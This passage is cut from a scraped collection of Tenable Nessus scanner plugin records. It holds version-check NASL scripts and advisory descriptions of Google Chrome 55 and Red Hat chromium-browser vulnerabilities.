script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:2919\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-55.0.2883.75-1.el6\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-55.0.2883.75-1.el6\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-55.0.2883.75-1.el6\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-55.0.2883.75-1.el6\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-06T03:22:23", "description": "The version of Google Chrome installed on the remote Windows host is prior to 55.0.2883.75. It is, therefore, affected by the following vulnerabilities :\n\n - A use-after-free error exists in PDFium in the Document::removeField() function within file fpdfsdk/javascript/Document.cpp when removing fields within a document. An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code.\n (CVE-2016-5203)\n\n - A universal cross-site scripting (XSS) vulnerability exists in Blink due to improper handling of the 'use' SVG element when calling event listeners on a cloned node. An unauthenticated, remote attacker can exploit this to execute arbitrary script code in a user's browser session. (CVE-2016-5204)\n\n - A universal cross-site scripting (XSS) vulnerability exists in Blink due to permitting frame swaps during frame detach. An unauthenticated, remote attacker can exploit this to execute arbitrary script code in a user's browser session. (CVE-2016-5205)\n\n - A security bypass vulnerability exists in PDFium due to a flaw in the DocumentLoader::GetRequest() function within file pdf/document_loader.cc when handling redirects in the plugin. An unauthenticated, remote attacker can exploit this to bypass the same-origin policy. (CVE-2016-5206)\n\n - A universal cross-site scripting (XSS) vulnerability exists in Blink, specifically in the V8EventListener::getListenerFunction() function within file bindings/core/v8/V8EventListener.cpp, due to allowing the 'handleEvent' getter to run on forbidden scripts. An unauthenticated, remote attacker can exploit this to execute arbitrary script code in a user's browser session. (CVE-2016-5207)\n\n - A universal cross-site scripting (XSS) vulnerability exists in Blink due to improper handling of triggered events (e.g., closing a color chooser for an input element). An unauthenticated, remote attacker can exploit this to execute arbitrary script code in a user's browser session. (CVE-2016-5208)\n\n - An out-of-bounds write error exists in Blink due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2016-5209)\n\n - An out-of-bounds write error exists in PDFium in the CWeightTable::GetPixelWeightSize() function within file core/fxge/dib/fx_dib_engine.cpp. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2016-5210)\n\n - An unspecified use-after-free error exists in PDFium due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code.\n (CVE-2016-5211)\n\n - A unspecified flaw exists in the DevTools component due to improper validation of certain URLs that allows an unauthenticated, remote attacker to disclose the content of arbitrary files. (CVE-2016-5212)\n\n - Multiple use-after-free errors exist in the inspector component in V8 that allow an unauthenticated, remote attacker to execute arbitrary code. (CVE-2016-5213, CVE-2016-5219)\n\n - A file download protection bypass vulnerability exists when downloading files that involve 'data:' URIs, unknown URI schemes, or overly long URLs. An unauthenticated, remote attacker can exploit this to cause a file to be downloaded without applying the mark-of-the-web. (CVE-2016-5214)\n\n - A use-after-free error exists in WebAudio within file content/renderer/media/renderer_webaudiodevice_impl.cc due to improper handling of web audio. An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2016-5215)\n\n - A use-after-free error exists in PDFium, specifically within file pdf/pdfium/pdfium_engine.cc, due to improper handling of non-visible page unloading. An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2016-5216)\n\n - A flaw exists in PDFium due to the use of unvalidated data by the PDF helper extension. An authenticated, remote attacker can exploit this to have an unspecified impact. No other details are available. (CVE-2016-5217)\n\n - A flaw exists when handling chrome.tabs API navigations and displaying the pending URL. An unauthenticated, remote attacker can exploit this to spoof the Omnibox address. (CVE-2016-5218)\n\n - An information disclosure vulnerability exists in PDFium, due to improper handling of 'file: navigation', that allows an unauthenticated, remote attacker to disclose local files. (CVE-2016-5220)\n\n - An integer overflow condition exists in ANGLE due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to have an unspecified impact. (CVE-2016-5221)\n\n - A flaw exists in the NavigatorImpl::NavigateToEntry() function within file frame_host/navigator_impl.cc due to improper handling of invalid URLs. An unauthenticated, remote attacker can exploit this to spoof the Omnibox address. (CVE-2016-5222)\n\n - An integer overflow condition exists in PDFium within file core/fpdfapi/page/cpdf_page.cpp that allows an authenticated, remote attacker to have an unspecified impact. No other details are available. (CVE-2016-5223)\n\n - A security bypass vulnerability exists in the SVG component due to denorm handling not being disabled before calling Skia filter code. An unauthenticated, remote attacker can exploit this to bypass the same-origin policy. (CVE-2016-5224)\n\n - A flaw exists in Blink, specifically in the HTMLFormElement::scheduleFormSubmission() function within file html/HTMLFormElement.cpp, due to improper enforcement of the form-action CSP (Content Security Policy). An unauthenticated, remote attacker can exploit this to bypass intended access restrictions.\n (CVE-2016-5225)\n\n - A cross-site scripting (XSS) vulnerability exists in Blink within file ui/views/tabs/tab_strip.cc due to improper validation of input when dropping JavaScript URLs on a tab. An unauthenticated, remote attacker can exploit this to execute arbitrary script code in a user's browser session. (CVE-2016-5226)\n\n - An unspecified flaw exists that allows an unauthenticated, remote attacker to disclose Content Security Policy (CSP) referrers. (CVE-2016-9650)\n\n - An unspecified flaw exists in V8 within lookup.cc that allows unauthorized private property access. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2016-9651)\n\n - Multiple other vulnerabilities exist, the most serious of which can be exploited by an authenticated, remote attacker to execute arbitrary code. (CVE-2016-9652)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-02T00:00:00", "type": "nessus", "title": "Google Chrome < 55.0.2883.75 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2019-11-22T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_55_0_2883_75.NASL", "href": "https://www.tenable.com/plugins/nessus/95480", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95480);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2016-5203\",\n \"CVE-2016-5204\",\n \"CVE-2016-5205\",\n \"CVE-2016-5206\",\n \"CVE-2016-5207\",\n \"CVE-2016-5208\",\n \"CVE-2016-5209\",\n \"CVE-2016-5210\",\n \"CVE-2016-5211\",\n \"CVE-2016-5212\",\n \"CVE-2016-5213\",\n \"CVE-2016-5214\",\n \"CVE-2016-5215\",\n \"CVE-2016-5216\",\n \"CVE-2016-5217\",\n \"CVE-2016-5218\",\n \"CVE-2016-5219\",\n \"CVE-2016-5220\",\n \"CVE-2016-5221\",\n \"CVE-2016-5222\",\n \"CVE-2016-5223\",\n \"CVE-2016-5224\",\n \"CVE-2016-5225\",\n \"CVE-2016-5226\",\n \"CVE-2016-9650\",\n \"CVE-2016-9651\",\n \"CVE-2016-9652\"\n );\n script_bugtraq_id(94633);\n\n script_name(english:\"Google Chrome < 55.0.2883.75 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 55.0.2883.75. It is, therefore, affected by the following\nvulnerabilities :\n\n - A use-after-free error exists in PDFium in the\n Document::removeField() function within file\n fpdfsdk/javascript/Document.cpp when removing fields\n within a document. An unauthenticated, remote attacker\n can exploit this to dereference already freed memory,\n resulting in the execution of arbitrary code.\n (CVE-2016-5203)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in Blink due to improper handling of the 'use'\n SVG element when calling event listeners on a cloned\n node. An unauthenticated, remote attacker can exploit\n this to execute arbitrary script code in a user's\n browser session. (CVE-2016-5204)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in Blink due to permitting frame swaps during\n frame detach. An unauthenticated, remote attacker can\n exploit this to execute arbitrary script code in a\n user's browser session. (CVE-2016-5205)\n\n - A security bypass vulnerability exists in PDFium due to\n a flaw in the DocumentLoader::GetRequest() function\n within file pdf/document_loader.cc when handling\n redirects in the plugin. An unauthenticated, remote\n attacker can exploit this to bypass the same-origin\n policy. (CVE-2016-5206)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in Blink, specifically in the\n V8EventListener::getListenerFunction() function within\n file bindings/core/v8/V8EventListener.cpp, due to\n allowing the 'handleEvent' getter to run on forbidden\n scripts. An unauthenticated, remote attacker can exploit\n this to execute arbitrary script code in a user's\n browser session. (CVE-2016-5207)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in Blink due to improper handling of triggered\n events (e.g., closing a color chooser for an input\n element). An unauthenticated, remote attacker can\n exploit this to execute arbitrary script code in a\n user's browser session. (CVE-2016-5208)\n\n - An out-of-bounds write error exists in Blink due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2016-5209)\n\n - An out-of-bounds write error exists in PDFium in the\n CWeightTable::GetPixelWeightSize() function within file\n core/fxge/dib/fx_dib_engine.cpp. An unauthenticated,\n remote attacker can exploit this to corrupt memory,\n resulting in a denial of service condition or the\n execution of arbitrary code. (CVE-2016-5210)\n\n - An unspecified use-after-free error exists in PDFium due\n to improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n corrupt memory, resulting in a denial of service\n condition or the execution of arbitrary code.\n (CVE-2016-5211)\n\n - A unspecified flaw exists in the DevTools component due\n to improper validation of certain URLs that allows an\n unauthenticated, remote attacker to disclose the content\n of arbitrary files. (CVE-2016-5212)\n\n - Multiple use-after-free errors exist in the inspector\n component in V8 that allow an unauthenticated, remote\n attacker to execute arbitrary code. (CVE-2016-5213,\n CVE-2016-5219)\n\n - A file download protection bypass vulnerability exists\n when downloading files that involve 'data:' URIs,\n unknown URI schemes, or overly long URLs. An\n unauthenticated, remote attacker can exploit this to\n cause a file to be downloaded without applying the\n mark-of-the-web. (CVE-2016-5214)\n\n - A use-after-free error exists in WebAudio within file\n content/renderer/media/renderer_webaudiodevice_impl.cc\n due to improper handling of web audio. An\n unauthenticated, remote attacker can exploit this to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2016-5215)\n\n - A use-after-free error exists in PDFium, specifically\n within file pdf/pdfium/pdfium_engine.cc, due to improper\n handling of non-visible page unloading. An\n unauthenticated, remote attacker can exploit this to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2016-5216)\n\n - A flaw exists in PDFium due to the use of unvalidated\n data by the PDF helper extension. An authenticated,\n remote attacker can exploit this to have an unspecified\n impact. No other details are available. (CVE-2016-5217)\n\n - A flaw exists when handling chrome.tabs API navigations\n and displaying the pending URL. An unauthenticated,\n remote attacker can exploit this to spoof the Omnibox\n address. (CVE-2016-5218)\n\n - An information disclosure vulnerability exists in\n PDFium, due to improper handling of 'file: navigation',\n that allows an unauthenticated, remote attacker to\n disclose local files. (CVE-2016-5220)\n\n - An integer overflow condition exists in ANGLE due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n have an unspecified impact. (CVE-2016-5221)\n\n - A flaw exists in the NavigatorImpl::NavigateToEntry()\n function within file frame_host/navigator_impl.cc due to\n improper handling of invalid URLs. An unauthenticated,\n remote attacker can exploit this to spoof the Omnibox\n address. (CVE-2016-5222)\n\n - An integer overflow condition exists in PDFium within\n file core/fpdfapi/page/cpdf_page.cpp that allows an\n authenticated, remote attacker to have an unspecified\n impact. No other details are available. (CVE-2016-5223)\n\n - A security bypass vulnerability exists in the SVG\n component due to denorm handling not being disabled\n before calling Skia filter code. An unauthenticated,\n remote attacker can exploit this to bypass the\n same-origin policy. (CVE-2016-5224)\n\n - A flaw exists in Blink, specifically in the\n HTMLFormElement::scheduleFormSubmission() function\n within file html/HTMLFormElement.cpp, due to improper\n enforcement of the form-action CSP (Content Security\n Policy). An unauthenticated, remote attacker can exploit\n this to bypass intended access restrictions.\n (CVE-2016-5225)\n\n - A cross-site scripting (XSS) vulnerability exists in\n Blink within file ui/views/tabs/tab_strip.cc due to\n improper validation of input when dropping JavaScript\n URLs on a tab. An unauthenticated, remote attacker can\n exploit this to execute arbitrary script code in a\n user's browser session. (CVE-2016-5226)\n\n - An unspecified flaw exists that allows an\n unauthenticated, remote attacker to disclose Content\n Security Policy (CSP) referrers. (CVE-2016-9650)\n\n - An unspecified flaw exists in V8 within lookup.cc that\n allows unauthorized private property access. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2016-9651)\n\n - Multiple other vulnerabilities exist, the most serious\n of which can be exploited by an authenticated, remote\n attacker to execute arbitrary code. (CVE-2016-9652)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://googlechromereleases.blogspot.com/2016/12/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bfe6e9a5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 55.0.2883.75 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9652\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'55.0.2883.75', severity:SECURITY_HOLE, xss:TRUE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-06T03:22:41", "description": "The version of Google Chrome installed on the remote macOS or Mac OS X host is prior to 55.0.2883.75. It is, therefore, affected by the following vulnerabilities :\n\n - A use-after-free error exists in PDFium in the Document::removeField() function within file fpdfsdk/javascript/Document.cpp when removing fields within a document. An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code.\n (CVE-2016-5203)\n\n - A universal cross-site scripting (XSS) vulnerability exists in Blink due to improper handling of the 'use' SVG element when calling event listeners on a cloned node. An unauthenticated, remote attacker can exploit this to execute arbitrary script code in a user's browser session. (CVE-2016-5204)\n\n - A universal cross-site scripting (XSS) vulnerability exists in Blink due to permitting frame swaps during frame detach. An unauthenticated, remote attacker can exploit this to execute arbitrary script code in a user's browser session. (CVE-2016-5205)\n\n - A security bypass vulnerability exists in PDFium due to a flaw in the DocumentLoader::GetRequest() function within file pdf/document_loader.cc when handling redirects in the plugin. An unauthenticated, remote attacker can exploit this to bypass the same-origin policy. (CVE-2016-5206)\n\n - A universal cross-site scripting (XSS) vulnerability exists in Blink, specifically in the V8EventListener::getListenerFunction() function within file bindings/core/v8/V8EventListener.cpp, due to allowing the 'handleEvent' getter to run on forbidden scripts. An unauthenticated, remote attacker can exploit this to execute arbitrary script code in a user's browser session. (CVE-2016-5207)\n\n - A universal cross-site scripting (XSS) vulnerability exists in Blink due to improper handling of triggered events (e.g., closing a color chooser for an input element). An unauthenticated, remote attacker can exploit this to execute arbitrary script code in a user's browser session. (CVE-2016-5208)\n\n - An out-of-bounds write error exists in Blink due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2016-5209)\n\n - An out-of-bounds write error exists in PDFium in the CWeightTable::GetPixelWeightSize() function within file core/fxge/dib/fx_dib_engine.cpp. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2016-5210)\n\n - An unspecified use-after-free error exists in PDFium due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code.\n (CVE-2016-5211)\n\n - A unspecified flaw exists in the DevTools component due to improper validation of certain URLs that allows an unauthenticated, remote attacker to disclose the content of arbitrary files. (CVE-2016-5212)\n\n - Multiple use-after-free errors exist in the inspector component in V8 that allow an unauthenticated, remote attacker to execute arbitrary code. (CVE-2016-5213, CVE-2016-5219)\n\n - A file download protection bypass vulnerability exists when downloading files that involve 'data:' URIs, unknown URI schemes, or overly long URLs. An unauthenticated, remote attacker can exploit this to cause a file to be downloaded without applying the mark-of-the-web. (CVE-2016-5214)\n\n - A use-after-free error exists in WebAudio within file content/renderer/media/renderer_webaudiodevice_impl.cc due to improper handling of web audio. An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2016-5215)\n\n - A use-after-free error exists in PDFium, specifically within file pdf/pdfium/pdfium_engine.cc, due to improper handling of non-visible page unloading. An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2016-5216)\n\n - A flaw exists in PDFium due to the use of unvalidated data by the PDF helper extension. An authenticated, remote attacker can exploit this to have an unspecified impact. No other details are available. (CVE-2016-5217)\n\n - A flaw exists when handling chrome.tabs API navigations and displaying the pending URL. An unauthenticated, remote attacker can exploit this to spoof the Omnibox address. (CVE-2016-5218)\n\n - An information disclosure vulnerability exists in PDFium, due to improper handling of 'file: navigation', that allows an unauthenticated, remote attacker to disclose local files. (CVE-2016-5220)\n\n - An integer overflow condition exists in ANGLE due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to have an unspecified impact. (CVE-2016-5221)\n\n - A flaw exists in the NavigatorImpl::NavigateToEntry() function within file frame_host/navigator_impl.cc due to improper handling of invalid URLs. An unauthenticated, remote attacker can exploit this to spoof the Omnibox address. (CVE-2016-5222)\n\n - An integer overflow condition exists in PDFium within file core/fpdfapi/page/cpdf_page.cpp that allows an authenticated, remote attacker to have an unspecified impact. No other details are available. (CVE-2016-5223)\n\n - A security bypass vulnerability exists in the SVG component due to denorm handling not being disabled before calling Skia filter code. An unauthenticated, remote attacker can exploit this to bypass the same-origin policy. (CVE-2016-5224)\n\n - A flaw exists in Blink, specifically in the HTMLFormElement::scheduleFormSubmission() function within file html/HTMLFormElement.cpp, due to improper enforcement of the form-action CSP (Content Security Policy). An unauthenticated, remote attacker can exploit this to bypass intended access restrictions.\n (CVE-2016-5225)\n\n - A cross-site scripting (XSS) vulnerability exists in Blink within file ui/views/tabs/tab_strip.cc due to improper validation of input when dropping JavaScript URLs on a tab. An unauthenticated, remote attacker can exploit this to execute arbitrary script code in a user's browser session. (CVE-2016-5226)\n\n - An unspecified flaw exists that allows an unauthenticated, remote attacker to disclose Content Security Policy (CSP) referrers. (CVE-2016-9650)\n\n - An unspecified flaw exists in V8 within lookup.cc that allows unauthorized private property access. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2016-9651)\n\n - Multiple other vulnerabilities exist, the most serious of which can be exploited by an authenticated, remote attacker to execute arbitrary code. (CVE-2016-9652)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-02T00:00:00", "type": "nessus", "title": "Google Chrome < 55.0.2883.75 Multiple Vulnerabilities (macOS)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2019-11-22T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_55_0_2883_75.NASL", "href": "https://www.tenable.com/plugins/nessus/95481", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95481);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2016-5203\",\n \"CVE-2016-5204\",\n \"CVE-2016-5205\",\n \"CVE-2016-5206\",\n \"CVE-2016-5207\",\n \"CVE-2016-5208\",\n \"CVE-2016-5209\",\n \"CVE-2016-5210\",\n \"CVE-2016-5211\",\n \"CVE-2016-5212\",\n \"CVE-2016-5213\",\n \"CVE-2016-5214\",\n \"CVE-2016-5215\",\n \"CVE-2016-5216\",\n \"CVE-2016-5217\",\n \"CVE-2016-5218\",\n \"CVE-2016-5219\",\n \"CVE-2016-5220\",\n \"CVE-2016-5221\",\n \"CVE-2016-5222\",\n \"CVE-2016-5223\",\n \"CVE-2016-5224\",\n \"CVE-2016-5225\",\n \"CVE-2016-5226\",\n \"CVE-2016-9650\",\n \"CVE-2016-9651\",\n \"CVE-2016-9652\"\n );\n script_bugtraq_id(94633);\n\n script_name(english:\"Google Chrome < 55.0.2883.75 Multiple Vulnerabilities (macOS)\");\n script_summary(english:\"Checks the version of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS or Mac OS X\nhost is prior to 55.0.2883.75. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A use-after-free error exists in PDFium in the\n Document::removeField() function within file\n fpdfsdk/javascript/Document.cpp when removing fields\n within a document. An unauthenticated, remote attacker\n can exploit this to dereference already freed memory,\n resulting in the execution of arbitrary code.\n (CVE-2016-5203)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in Blink due to improper handling of the 'use'\n SVG element when calling event listeners on a cloned\n node. An unauthenticated, remote attacker can exploit\n this to execute arbitrary script code in a user's\n browser session. (CVE-2016-5204)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in Blink due to permitting frame swaps during\n frame detach. An unauthenticated, remote attacker can\n exploit this to execute arbitrary script code in a\n user's browser session. (CVE-2016-5205)\n\n - A security bypass vulnerability exists in PDFium due to\n a flaw in the DocumentLoader::GetRequest() function\n within file pdf/document_loader.cc when handling\n redirects in the plugin. An unauthenticated, remote\n attacker can exploit this to bypass the same-origin\n policy. (CVE-2016-5206)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in Blink, specifically in the\n V8EventListener::getListenerFunction() function within\n file bindings/core/v8/V8EventListener.cpp, due to\n allowing the 'handleEvent' getter to run on forbidden\n scripts. An unauthenticated, remote attacker can exploit\n this to execute arbitrary script code in a user's\n browser session. (CVE-2016-5207)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in Blink due to improper handling of triggered\n events (e.g., closing a color chooser for an input\n element). An unauthenticated, remote attacker can\n exploit this to execute arbitrary script code in a\n user's browser session. (CVE-2016-5208)\n\n - An out-of-bounds write error exists in Blink due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2016-5209)\n\n - An out-of-bounds write error exists in PDFium in the\n CWeightTable::GetPixelWeightSize() function within file\n core/fxge/dib/fx_dib_engine.cpp. An unauthenticated,\n remote attacker can exploit this to corrupt memory,\n resulting in a denial of service condition or the\n execution of arbitrary code. (CVE-2016-5210)\n\n - An unspecified use-after-free error exists in PDFium due\n to improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n corrupt memory, resulting in a denial of service\n condition or the execution of arbitrary code.\n (CVE-2016-5211)\n\n - A unspecified flaw exists in the DevTools component due\n to improper validation of certain URLs that allows an\n unauthenticated, remote attacker to disclose the content\n of arbitrary files. (CVE-2016-5212)\n\n - Multiple use-after-free errors exist in the inspector\n component in V8 that allow an unauthenticated, remote\n attacker to execute arbitrary code. (CVE-2016-5213,\n CVE-2016-5219)\n\n - A file download protection bypass vulnerability exists\n when downloading files that involve 'data:' URIs,\n unknown URI schemes, or overly long URLs. An\n unauthenticated, remote attacker can exploit this to\n cause a file to be downloaded without applying the\n mark-of-the-web. (CVE-2016-5214)\n\n - A use-after-free error exists in WebAudio within file\n content/renderer/media/renderer_webaudiodevice_impl.cc\n due to improper handling of web audio. An\n unauthenticated, remote attacker can exploit this to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2016-5215)\n\n - A use-after-free error exists in PDFium, specifically\n within file 